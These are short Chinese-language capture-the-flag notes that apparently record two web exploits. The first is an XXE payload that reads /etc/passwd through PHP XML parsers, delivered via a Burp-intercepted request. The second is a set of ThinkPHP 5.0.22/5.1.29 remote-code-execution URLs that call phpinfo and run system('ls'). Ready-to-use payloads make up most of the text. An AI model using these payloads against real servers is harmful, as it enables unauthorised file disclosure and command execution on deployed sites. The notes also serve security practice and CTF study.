1.[PHP]XXE
libxml2.9.0以后,默认不解析外部实体,导致XXE漏洞逐渐消亡
dom.php、SimpleXMLElement.php、simplexml_load_string.php均可触发XXE漏洞
用burp抓包,在后方修改加入payload
payload:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >
]>
<root>
<name>&xxe;</name>
</root>
2.[ThinkPHP]5-Rce
Thinkphp5 5.0.22/5.1.29远程代码执行漏洞:
直接在网址后面加,在phpinfo中找到flag
/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls